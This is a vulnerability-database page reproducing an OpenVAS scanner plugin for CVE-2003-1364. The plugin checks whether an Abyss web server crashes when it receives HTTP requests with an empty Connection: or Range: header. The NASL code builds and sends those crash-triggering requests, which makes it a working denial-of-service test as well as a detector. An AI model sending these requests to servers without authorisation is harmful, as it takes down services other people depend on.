Lucene search
K

Abyss httpd crash

🗓️ 24 Oct 2008 00:00:00Reported by This script is Copyright (C) 2003 Renaud DeraisonType 
openvas
 openvas
🔗 plugins.openvas.org👁 37 Views

Abyss httpd crash due to empty HTTP field

Related
Code
ReporterTitlePublishedViews
Family
Tenable Nessus
Abyss Web Server < 1.1.4 HTTP GET Header Remote DoS
20 Aug 200400:00
nessus
Tenable Nessus
Abyss Malformed GET Request Remote DoS
20 Aug 200400:00
nessus
Tenable Nessus
Abyss Web Server Malformed GET Request Remote DoS
6 Apr 200300:00
nessus
CVE
CVE-2003-1364
17 Oct 200701:00
cve
Cvelist
CVE-2003-1364
17 Oct 200701:00
cvelist
EUVD
EUVD-2003-1354
7 Oct 202500:30
euvd
Kaspersky
KLA10052 DoS vulnerability in Abyss Web Server
31 Dec 200300:00
kaspersky
NVD
CVE-2003-1364
31 Dec 200305:00
nvd
OpenVAS
Abyss httpd crash
24 Oct 200800:00
openvas
# OpenVAS Vulnerability Test
# $Id: abyss_dos.nasl 5390 2017-02-21 18:39:27Z mime $
# Description: Abyss httpd crash
#
# Authors:
# Renaud Deraison <[email protected]>
#
# Copyright:
# Copyright (C) 2003 Renaud Deraison
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2,
# as published by the Free Software Foundation
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
#

tag_summary = "It was possible to kill the web server by
sending empty HTTP fields (namely Connection: and Range: ).

An attacker may use this flaw to prevent this host from performing
its job properly.";

tag_solution = "If the remote web server is Abyss X1, then upgrade to
Abyss X1 v.1.1.4, otherwise inform your vendor of this flaw.";

# References:
# Date: Sat, 5 Apr 2003 12:21:48 +0000
# From: Auriemma Luigi <[email protected]>
# To: [email protected], [email protected],
#        [email protected], [email protected]
# Subject: [VulnWatch] Abyss X1 1.1.2 remote crash

if(description)
{
 script_id(80047);;
 script_version("$Revision: 5390 $");
 script_tag(name:"last_modification", value:"$Date: 2017-02-21 19:39:27 +0100 (Tue, 21 Feb 2017) $");
 script_tag(name:"creation_date", value:"2008-10-24 23:33:44 +0200 (Fri, 24 Oct 2008)");
 script_cve_id("CVE-2003-1364");
 script_bugtraq_id(7287);
 script_xref(name:"OSVDB", value:"2226");
 script_tag(name:"cvss_base", value:"8.5");
 script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:N/I:P/A:C");
 name = "Abyss httpd crash";
 script_name(name);
 
 
 script_category(ACT_DENIAL);
  script_tag(name:"qod_type", value:"remote_vul");
 
 script_copyright("This script is Copyright (C) 2003 Renaud Deraison");
 family = "Denial of Service";
 script_family(family);
 script_dependencies("find_service1.nasl", "no404.nasl", "gb_get_http_banner.nasl");
 script_require_ports("Services/www", 80);
 script_mandatory_keys("Abyss/banner");
 script_tag(name : "solution" , value : tag_solution);
 script_tag(name : "summary" , value : tag_summary);
 exit(0);
}

########


include("http_func.inc");

port = get_http_port(default:80);

if(! get_port_state(port)) exit(0);
banner = get_http_banner(port:port);
if ( ! banner || "Abyss/" >!< banner ) exit(0);

if(http_is_dead(port:port))exit(0);

req = string("GET / HTTP/1.0\r\n", "Host: ", get_host_name(), "\r\n", "Connection: \r\n\r\n");
soc = http_open_socket(port);
if(! soc) exit(0);

send(socket:soc, data: req);
r = http_recv(socket:soc);
http_close_socket(soc);



if(http_is_dead(port: port)) { security_message(port); }



req = string("GET / HTTP/1.0\r\n", "Host: ", get_host_name(), "\r\n", "Range: \r\n\r\n");
soc = http_open_socket(port);
if(! soc) exit(0);

send(socket:soc, data: req);
r = http_recv(socket:soc);
http_close_socket(soc);

if(http_is_dead(port: port)) { security_message(port); }

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

21 Feb 2017 00:00Current
0.1Low risk
Vulners AI Score0.1
EPSS0.05309
37